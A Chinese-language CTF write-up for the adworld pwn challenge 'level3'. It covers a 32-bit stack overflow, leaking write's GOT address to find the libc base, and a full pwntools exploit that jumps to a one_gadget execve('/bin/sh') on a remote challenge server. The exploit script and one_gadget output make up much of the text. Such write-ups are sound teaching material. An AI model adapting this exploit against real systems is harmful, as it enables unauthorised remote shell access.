简单栈溢出与execve执行|攻防世界新手区level3

前言

pwn新手区还残留一题，就是这个level3，当初好像是因为远程打不通所以没做掉.我记得当初好像是没有给库的，现在给了个libc_32.so.6

0x00.检查保护

devil@ubuntu:~/adworld/pwn$ checksec level3 
[*] '/home/devil/adworld/pwn/level3'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found   ;可以进行栈溢出
    NX:       NX enabled
    PIE:      No PIE (0x8048000)

0x01.栈溢出漏洞

read函数有明显栈溢出漏洞，程序本身不存在system("/bin/sh")，无法通过溢出直接getshell

0x02.one_gadget

自从学会了使用one_gadget，遇到给libc的题目屡试不爽
one_gadget使用实战看此

devil@ubuntu:~/adworld/pwn$ one_gadget libc_32.so.6
0x3a80c execve("/bin/sh", esp+0x28, environ)
constraints:
  esi is the GOT address of libc
  [esp+0x28] == NULL

0x3a80e execve("/bin/sh", esp+0x2c, environ)
constraints:
  esi is the GOT address of libc
  [esp+0x2c] == NULL

0x3a812 execve("/bin/sh", esp+0x30, environ)
constraints:
  esi is the GOT address of libc
  [esp+0x30] == NULL

0x3a819 execve("/bin/sh", esp+0x34, environ)
constraints:
  esi is the GOT address of libc
  [esp+0x34] == NULL

0x5f065 execl("/bin/sh", eax)
constraints:
  esi is the GOT address of libc
  eax == NULL

0x5f066 execl("/bin/sh", [esp])
constraints:
  esi is the GOT address of libc
  [esp] == NULL

使用one_gadget获得execve函数地址

execve = 0x3a80c

注意：
*cyclic计算得到溢出需要144字节,注意,144是输入到esp-4的距离（padding=144-4）。如果junk="A"144,在执行payload的时候程序会报错。
举例而言：

A: aaaa
B: aaab
C: aaac
D: aaad
cyclic -l aaaa = 4
cyclic -l aaad = 16

144-4表示输入的位置到esp的距离

0x03.思路

1.要执行execve，要先获得libc库的偏移，才能得到execve_addr
2.通过溢出执行execve从而getshell
3.通过write(1,addr,4)函数来泄露write函数地址，从而获得libc的偏移,再得到execve地址即可

0x04.exp

from pwn import *
p = remote("111.198.29.45",37840)
elf = ELF("./level3")
libc = ELF("./libc_32.so.6")
context(log_level='debug',arch='i386',os='linux')
execve = 0x3a80c #execve地址
junk = "A"*140
main_addr = elf.symbols['main']
write_got = elf.got['write']
write_plt = elf.plt['write']
payload1 = junk + p32(write_plt) + p32(main_addr) 
payload1 += p32(1) + p32(write_got) + p32(4) 
p.recv()
p.sendline(payload1)
data = p.recv()[:4]
write_addr = u32(data)
offset = write_addr - libc.symbols['write'] #计算libc偏移
execve_addr = offset + execve
payload = junk + p32(execve_addr)
p.sendlineafter("Input:\n",payload)
p.interactive()